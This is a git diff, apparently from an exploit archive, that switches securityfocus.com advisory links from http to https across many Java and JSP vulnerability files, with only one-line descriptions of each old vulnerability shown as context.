-source: http://www.securityfocus.com/bid/13753/info +source: https://www.securityfocus.com/bid/13753/info Sun JavaMail is prone to multiple information disclosure vulnerabilities. The issues exist due to a lack of sufficient input sanitization performed on user-supplied requests. The following issues are reported: diff --git a/exploits/java/webapps/26001.txt b/exploits/java/webapps/26001.txt index 9e11e259f..fbb7489c5 100644 --- a/exploits/java/webapps/26001.txt +++ b/exploits/java/webapps/26001.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/14310/info +source: https://www.securityfocus.com/bid/14310/info Novell GroupWise WebAccess is prone to an HTML injection vulnerability. This may be used to inject hostile HTML and script code into the Web mail application. When a user opens an email containing the hostile code, it may be rendered in their browser. diff --git a/exploits/java/webapps/26987.txt b/exploits/java/webapps/26987.txt index 4292135ee..f522141f5 100644 --- a/exploits/java/webapps/26987.txt +++ b/exploits/java/webapps/26987.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/16073/info +source: https://www.securityfocus.com/bid/16073/info FatWire UpdateEngine is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/27888.txt b/exploits/java/webapps/27888.txt index 4ffc60ba6..32f731d24 100644 --- a/exploits/java/webapps/27888.txt +++ b/exploits/java/webapps/27888.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18007/info +source: https://www.securityfocus.com/bid/18007/info Resin is prone to an information-disclosure vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/28116.txt b/exploits/java/webapps/28116.txt index 37aec2453..3575afd99 100644 --- a/exploits/java/webapps/28116.txt +++ b/exploits/java/webapps/28116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/18677/info +source: https://www.securityfocus.com/bid/18677/info H-Sphere is prone to multiple cross-site scripting vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30271.txt b/exploits/java/webapps/30271.txt index 9c20901d3..efe019f95 100644 --- a/exploits/java/webapps/30271.txt +++ b/exploits/java/webapps/30271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30272.txt b/exploits/java/webapps/30272.txt index 056a73ca6..79881ba02 100644 --- a/exploits/java/webapps/30272.txt +++ b/exploits/java/webapps/30272.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30273.txt b/exploits/java/webapps/30273.txt index 30ccf0293..e1127fc69 100644 --- a/exploits/java/webapps/30273.txt +++ b/exploits/java/webapps/30273.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30274.txt b/exploits/java/webapps/30274.txt index fe2302a90..fb376981c 100644 --- a/exploits/java/webapps/30274.txt +++ b/exploits/java/webapps/30274.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30275.txt b/exploits/java/webapps/30275.txt index 712550978..cf94c2216 100644 --- a/exploits/java/webapps/30275.txt +++ b/exploits/java/webapps/30275.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/24767/info +source: https://www.securityfocus.com/bid/24767/info OpManager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30514.txt b/exploits/java/webapps/30514.txt index eef4d08b5..65d87fd71 100644 --- a/exploits/java/webapps/30514.txt +++ b/exploits/java/webapps/30514.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/25391/info +source: https://www.securityfocus.com/bid/25391/info ALeadSoft Search Engine Builder is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/30674.txt b/exploits/java/webapps/30674.txt index fafd8dfb4..794255947 100644 --- a/exploits/java/webapps/30674.txt +++ b/exploits/java/webapps/30674.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/26082/info +source: https://www.securityfocus.com/bid/26082/info Stringbeans Portal is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/31073.html b/exploits/java/webapps/31073.html index a3b0ede4f..0d0dc3add 100644 --- a/exploits/java/webapps/31073.html +++ b/exploits/java/webapps/31073.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27490/info +source: https://www.securityfocus.com/bid/27490/info Banner Student is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/java/webapps/31189.txt b/exploits/java/webapps/31189.txt index 15e2e31db..9f3604dc6 100644 --- a/exploits/java/webapps/31189.txt +++ b/exploits/java/webapps/31189.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27775/info +source: https://www.securityfocus.com/bid/27775/info Cisco Unified Communications Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/java/webapps/31438.txt b/exploits/java/webapps/31438.txt index f73f84e92..dfc1e0767 100644 --- a/exploits/java/webapps/31438.txt +++ b/exploits/java/webapps/31438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28296/info +source: https://www.securityfocus.com/bid/28296/info IBM Rational ClearQuest is prone to multiple cross-site scripting vulnerabilities because it fails to adequately sanitize user-supplied input. diff --git a/exploits/java/webapps/31621.txt b/exploits/java/webapps/31621.txt index fb090bc57..736cf07ee 100644 --- a/exploits/java/webapps/31621.txt +++ b/exploits/java/webapps/31621.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28649/info +source: https://www.securityfocus.com/bid/28649/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/31641.txt b/exploits/java/webapps/31641.txt index e93f61883..2eefab531 100644 --- a/exploits/java/webapps/31641.txt +++ b/exploits/java/webapps/31641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28762/info +source: https://www.securityfocus.com/bid/28762/info Business Objects is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input via the Infoview web portal. diff --git a/exploits/java/webapps/31816.txt b/exploits/java/webapps/31816.txt index 99811fc37..045b0bfe5 100644 --- a/exploits/java/webapps/31816.txt +++ b/exploits/java/webapps/31816.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29317/info +source: https://www.securityfocus.com/bid/29317/info SAP Web Application Server is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/32448.txt b/exploits/java/webapps/32448.txt index cf56295bf..ccfd48240 100644 --- a/exploits/java/webapps/32448.txt +++ b/exploits/java/webapps/32448.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31514/info +source: https://www.securityfocus.com/bid/31514/info Celoxis is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32459.txt b/exploits/java/webapps/32459.txt index 69a556ae7..66c67e25e 100644 --- a/exploits/java/webapps/32459.txt +++ b/exploits/java/webapps/32459.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31580/info +source: https://www.securityfocus.com/bid/31580/info Kontiki Delivery Management System is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32574.txt b/exploits/java/webapps/32574.txt index 16a3df3ea..5d0b7ee49 100644 --- a/exploits/java/webapps/32574.txt +++ b/exploits/java/webapps/32574.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32208/info +source: https://www.securityfocus.com/bid/32208/info MoinMoin is prone to cross-site scripting and information-disclosure vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32818.txt b/exploits/java/webapps/32818.txt index 35df12419..4f6297470 100644 --- a/exploits/java/webapps/32818.txt +++ b/exploits/java/webapps/32818.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33912/info +source: https://www.securityfocus.com/bid/33912/info JOnAS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32821.html b/exploits/java/webapps/32821.html index b2d5f8c9b..d37c90a7d 100644 --- a/exploits/java/webapps/32821.html +++ b/exploits/java/webapps/32821.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33924/info +source: https://www.securityfocus.com/bid/33924/info APC PowerChute Network Shutdown is prone to an HTTP-response-splitting vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32858.txt b/exploits/java/webapps/32858.txt index 49aadec73..70c259497 100644 --- a/exploits/java/webapps/32858.txt +++ b/exploits/java/webapps/32858.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34140/info +source: https://www.securityfocus.com/bid/34140/info Sun Java System Messenger Express is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/32862.txt b/exploits/java/webapps/32862.txt index 7a7702d06..878131563 100644 --- a/exploits/java/webapps/32862.txt +++ b/exploits/java/webapps/32862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34153/info +source: https://www.securityfocus.com/bid/34153/info Sun Java System Calendar Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32863.txt b/exploits/java/webapps/32863.txt index 75c7e85e2..0ee78716c 100644 --- a/exploits/java/webapps/32863.txt +++ b/exploits/java/webapps/32863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34154/info +source: https://www.securityfocus.com/bid/34154/info Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32864.txt b/exploits/java/webapps/32864.txt index 10683a874..c60570dc1 100644 --- a/exploits/java/webapps/32864.txt +++ b/exploits/java/webapps/32864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34155/info +source: https://www.securityfocus.com/bid/34155/info Sun Java System Communications Express is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32897.txt b/exploits/java/webapps/32897.txt index ec99800c0..6fcb1a219 100644 --- a/exploits/java/webapps/32897.txt +++ b/exploits/java/webapps/32897.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34454/info +source: https://www.securityfocus.com/bid/34454/info Cisco Subscriber Edge Services Manager is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/32909.txt b/exploits/java/webapps/32909.txt index 7d0cd220d..ea51932e4 100644 --- a/exploits/java/webapps/32909.txt +++ b/exploits/java/webapps/32909.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34531/info +source: https://www.securityfocus.com/bid/34531/info Novell Teaming is prone to a user-enumeration weakness and multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/32927.txt b/exploits/java/webapps/32927.txt index 12dc1c6cc..f1addc1a7 100644 --- a/exploits/java/webapps/32927.txt +++ b/exploits/java/webapps/32927.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34573/info +source: https://www.securityfocus.com/bid/34573/info BlackBerry Enterprise Server MDS Connection Service is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/java/webapps/32940.txt b/exploits/java/webapps/32940.txt index ef214fbd0..f8e6c4a34 100644 --- a/exploits/java/webapps/32940.txt +++ b/exploits/java/webapps/32940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34643/info +source: https://www.securityfocus.com/bid/34643/info Sun Java System Delegated Administrator is prone to an HTTP response-splitting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/33048.txt b/exploits/java/webapps/33048.txt index b00647089..c744f8037 100644 --- a/exploits/java/webapps/33048.txt +++ b/exploits/java/webapps/33048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35450/info +source: https://www.securityfocus.com/bid/35450/info DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33181.txt b/exploits/java/webapps/33181.txt index 8bd0e58a2..ed35ff91f 100644 --- a/exploits/java/webapps/33181.txt +++ b/exploits/java/webapps/33181.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36088/info +source: https://www.securityfocus.com/bid/36088/info Computer Associates SiteMinder is prone to a security-bypass vulnerability because it fails to properly validate user-supplied input. diff --git a/exploits/java/webapps/33254.txt b/exploits/java/webapps/33254.txt index 8f10f43fd..b65587d49 100644 --- a/exploits/java/webapps/33254.txt +++ b/exploits/java/webapps/33254.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36513/info +source: https://www.securityfocus.com/bid/36513/info IBM Lotus Connections is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33286.txt b/exploits/java/webapps/33286.txt index 1660254b8..c2e1e3a77 100644 --- a/exploits/java/webapps/33286.txt +++ b/exploits/java/webapps/33286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36674/info +source: https://www.securityfocus.com/bid/36674/info Eclipse BIRT (Business Intelligence and Reporting Tools) is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33687.txt b/exploits/java/webapps/33687.txt index fc367edde..7d04768c2 100644 --- a/exploits/java/webapps/33687.txt +++ b/exploits/java/webapps/33687.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38483/info +source: https://www.securityfocus.com/bid/38483/info Sparta Systems TrackWise EQMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/33939.txt b/exploits/java/webapps/33939.txt index 7876c1c65..cd504e881 100644 --- a/exploits/java/webapps/33939.txt +++ b/exploits/java/webapps/33939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39941/info +source: https://www.securityfocus.com/bid/39941/info ShopEx Single is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/34108.txt b/exploits/java/webapps/34108.txt index 54b5e469a..374c65cb8 100644 --- a/exploits/java/webapps/34108.txt +++ b/exploits/java/webapps/34108.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40630/info +source: https://www.securityfocus.com/bid/40630/info PRTG Traffic Grapher is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/34290.txt b/exploits/java/webapps/34290.txt index 17ffed6b9..8e633c47b 100644 --- a/exploits/java/webapps/34290.txt +++ b/exploits/java/webapps/34290.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41529/info +source: https://www.securityfocus.com/bid/41529/info Mac's CMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/34293.txt b/exploits/java/webapps/34293.txt index 3f58f68d4..820b693b1 100644 --- a/exploits/java/webapps/34293.txt +++ b/exploits/java/webapps/34293.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41541/info +source: https://www.securityfocus.com/bid/41541/info dotDefender is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/34345.txt b/exploits/java/webapps/34345.txt index 82c4e4a2e..49449cf55 100644 --- a/exploits/java/webapps/34345.txt +++ b/exploits/java/webapps/34345.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41748/info +source: https://www.securityfocus.com/bid/41748/info jCore is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/35683.txt b/exploits/java/webapps/35683.txt index 4063e3e6b..00cfea87e 100644 --- a/exploits/java/webapps/35683.txt +++ b/exploits/java/webapps/35683.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47672/info +source: https://www.securityfocus.com/bid/47672/info LANSA aXes Web Terminal TN5250 is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/35781.txt b/exploits/java/webapps/35781.txt index 063b9b915..ed10a5ca6 100644 --- a/exploits/java/webapps/35781.txt +++ b/exploits/java/webapps/35781.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47905/info +source: https://www.securityfocus.com/bid/47905/info CiscoWorks Common Services is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/36292.txt b/exploits/java/webapps/36292.txt index a6a6f41a8..91d730a4f 100644 --- a/exploits/java/webapps/36292.txt +++ b/exploits/java/webapps/36292.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50567/info +source: https://www.securityfocus.com/bid/50567/info Oracle NoSQL is prone to a directory-traversal vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36299.txt b/exploits/java/webapps/36299.txt index c39513c08..135b2288c 100644 --- a/exploits/java/webapps/36299.txt +++ b/exploits/java/webapps/36299.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50646/info +source: https://www.securityfocus.com/bid/50646/info Infoblox NetMRI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/java/webapps/36548.txt b/exploits/java/webapps/36548.txt index abdccbd6c..4d7dcbb6b 100644 --- a/exploits/java/webapps/36548.txt +++ b/exploits/java/webapps/36548.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51404/info +source: https://www.securityfocus.com/bid/51404/info Contus Job Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/java/webapps/36666.txt b/exploits/java/webapps/36666.txt index 95c9815d1..be6a8f9d3 100644 --- a/exploits/java/webapps/36666.txt +++ b/exploits/java/webapps/36666.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51893/info +source: https://www.securityfocus.com/bid/51893/info ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36667.txt b/exploits/java/webapps/36667.txt index 6c89a9e4f..edbbd6cb5 100644 --- a/exploits/java/webapps/36667.txt +++ b/exploits/java/webapps/36667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51893/info +source: https://www.securityfocus.com/bid/51893/info ManageEngine ADManager Plus is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36684.txt b/exploits/java/webapps/36684.txt index acc9e2d5d..bab22821b 100644 --- a/exploits/java/webapps/36684.txt +++ b/exploits/java/webapps/36684.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/51964/info +source: https://www.securityfocus.com/bid/51964/info LxCenter Kloxo is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/36828.txt b/exploits/java/webapps/36828.txt index 210a0e0da..3b997d443 100644 --- a/exploits/java/webapps/36828.txt +++ b/exploits/java/webapps/36828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52060/info +source: https://www.securityfocus.com/bid/52060/info JaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/36939.txt b/exploits/java/webapps/36939.txt index e433296ea..37935d819 100644 --- a/exploits/java/webapps/36939.txt +++ b/exploits/java/webapps/36939.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52400/info +source: https://www.securityfocus.com/bid/52400/info EJBCA is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/java/webapps/36971.txt b/exploits/java/webapps/36971.txt index bdcbd1112..9a2a7159d 100644 --- a/exploits/java/webapps/36971.txt +++ b/exploits/java/webapps/36971.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52545/info +source: https://www.securityfocus.com/bid/52545/info JavaBB is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37006.txt b/exploits/java/webapps/37006.txt index 6a7c4010b..f19e94f31 100644 --- a/exploits/java/webapps/37006.txt +++ b/exploits/java/webapps/37006.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52672/info +source: https://www.securityfocus.com/bid/52672/info Minify is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37009.xml b/exploits/java/webapps/37009.xml index b259f313d..850e8fe0d 100644 --- a/exploits/java/webapps/37009.xml +++ b/exploits/java/webapps/37009.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52702/info +source: https://www.securityfocus.com/bid/52702/info Apache Struts2 is prone to a remote arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/37029.txt b/exploits/java/webapps/37029.txt index c4cb82fa9..52d722dfb 100644 --- a/exploits/java/webapps/37029.txt +++ b/exploits/java/webapps/37029.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37030.txt b/exploits/java/webapps/37030.txt index 541cb4f1f..10cb380aa 100644 --- a/exploits/java/webapps/37030.txt +++ b/exploits/java/webapps/37030.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37031.txt b/exploits/java/webapps/37031.txt index bdb255ef1..007c28f58 100644 --- a/exploits/java/webapps/37031.txt +++ b/exploits/java/webapps/37031.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37032.txt b/exploits/java/webapps/37032.txt index 46157108e..0544b9d88 100644 --- a/exploits/java/webapps/37032.txt +++ b/exploits/java/webapps/37032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52841/info +source: https://www.securityfocus.com/bid/52841/info Firewall Analyzer is prone to multiple cross-site scripting vulnerabilities because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37033.txt b/exploits/java/webapps/37033.txt index 79940757e..d07742b7b 100644 --- a/exploits/java/webapps/37033.txt +++ b/exploits/java/webapps/37033.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52845/info +source: https://www.securityfocus.com/bid/52845/info DirectAdmin is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/java/webapps/37372.html b/exploits/java/webapps/37372.html index 23aff5419..692fa7711 100644 --- a/exploits/java/webapps/37372.html +++ b/exploits/java/webapps/37372.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53924/info +source: https://www.securityfocus.com/bid/53924/info Identity Management is prone to a cross-site request-forgery vulnerability because the application fails to properly validate HTTP requests. diff --git a/exploits/java/webapps/37416.txt b/exploits/java/webapps/37416.txt index 850886d11..b0ce93516 100644 --- a/exploits/java/webapps/37416.txt +++ b/exploits/java/webapps/37416.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54049/info +source: https://www.securityfocus.com/bid/54049/info Squiz CMS is prone to multiple cross-site scripting vulnerabilities and an XML external entity injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/37555.txt b/exploits/java/webapps/37555.txt index a6917613d..8d99e19ec 100644 --- a/exploits/java/webapps/37555.txt +++ b/exploits/java/webapps/37555.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54756/info +source: https://www.securityfocus.com/bid/54756/info ManageEngine Applications Manager is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/java/webapps/37557.txt b/exploits/java/webapps/37557.txt index 72daf915a..f81f24e13 100644 --- a/exploits/java/webapps/37557.txt +++ b/exploits/java/webapps/37557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54759/info +source: https://www.securityfocus.com/bid/54759/info ManageEngine Applications Manager is prone to multiple SQL-injection and multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/37589.txt b/exploits/java/webapps/37589.txt index 07880aa40..5ae479f1a 100644 --- a/exploits/java/webapps/37589.txt +++ b/exploits/java/webapps/37589.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54881/info +source: https://www.securityfocus.com/bid/54881/info The ConcourseSuite is prone to a cross-site request-forgery vulnerability and multiple cross-site scripting vulnerabilities. diff --git a/exploits/java/webapps/38130.txt b/exploits/java/webapps/38130.txt index 2754845fa..fc893da6c 100644 --- a/exploits/java/webapps/38130.txt +++ b/exploits/java/webapps/38130.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/56933/info +source: https://www.securityfocus.com/bid/56933/info N-central is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/java/webapps/38358.txt b/exploits/java/webapps/38358.txt index 98ab9f496..6ddcca516 100644 --- a/exploits/java/webapps/38358.txt +++ b/exploits/java/webapps/38358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58293/info +source: https://www.securityfocus.com/bid/58293/info HP Intelligent Management Center is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/java/webapps/38461.txt b/exploits/java/webapps/38461.txt index 4f4bb6977..789ed142e 100644 --- a/exploits/java/webapps/38461.txt +++ b/exploits/java/webapps/38461.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59041/info +source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/38462.txt b/exploits/java/webapps/38462.txt index 41ba06e49..6f98eef79 100644 --- a/exploits/java/webapps/38462.txt +++ b/exploits/java/webapps/38462.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/59041/info +source: https://www.securityfocus.com/bid/59041/info Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/java/webapps/38739.txt b/exploits/java/webapps/38739.txt index 8af3ada53..26ec1e516 100644 --- a/exploits/java/webapps/38739.txt +++ b/exploits/java/webapps/38739.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/61974/info +source: https://www.securityfocus.com/bid/61974/info SearchBlox is prone to multiple information-disclosure vulnerabilities. diff --git a/exploits/java/webapps/39334.txt b/exploits/java/webapps/39334.txt index 73f06c6a7..430019215 100644 --- a/exploits/java/webapps/39334.txt +++ b/exploits/java/webapps/39334.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/68022/info +source: https://www.securityfocus.com/bid/68022/info Yealink VoIP Phones are prone to an HTTP-response-splitting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/jsp/dos/37218.txt b/exploits/jsp/dos/37218.txt index b3325e132..5a794a66e 100644 --- a/exploits/jsp/dos/37218.txt +++ b/exploits/jsp/dos/37218.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/53595/info +source: https://www.securityfocus.com/bid/53595/info JIRA, and the Gliffy and Tempo plugins for JIRA are prone to a denial-of-service vulnerability because they fail to properly handle crafted XML data. diff --git a/exploits/jsp/remote/20412.txt b/exploits/jsp/remote/20412.txt index e613544b5..fa7ffe9be 100644 --- a/exploits/jsp/remote/20412.txt +++ b/exploits/jsp/remote/20412.txt @@ -1,4 +1,4 @@ -source : http://www.securityfocus.com/bid/1970/info +source : https://www.securityfocus.com/bid/1970/info Unify eWave ServletExec is a Java/Java Servlet engine plug-in for major web servers such as Microsoft IIS, Apache, Netscape Enterprise Server, etc. diff --git a/exploits/jsp/remote/20429.txt b/exploits/jsp/remote/20429.txt index b4b57386f..bf274c4a1 100644 --- a/exploits/jsp/remote/20429.txt +++ b/exploits/jsp/remote/20429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/1986/info +source: https://www.securityfocus.com/bid/1986/info Resin is a servlet and JSP engine that supports java and javascript. diff --git a/exploits/jsp/remote/20592.txt b/exploits/jsp/remote/20592.txt index c93c828ae..40dc52725 100644 --- a/exploits/jsp/remote/20592.txt +++ b/exploits/jsp/remote/20592.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/2288/info +source: https://www.securityfocus.com/bid/2288/info A problem with Oracle on the Windows 2000 platform could allow users access to restricted information. This problem in the handling of input by the Oracle software may result in remote users being permitted read access to files on the same partition as the webroot directory. diff --git a/exploits/jsp/remote/21355.txt 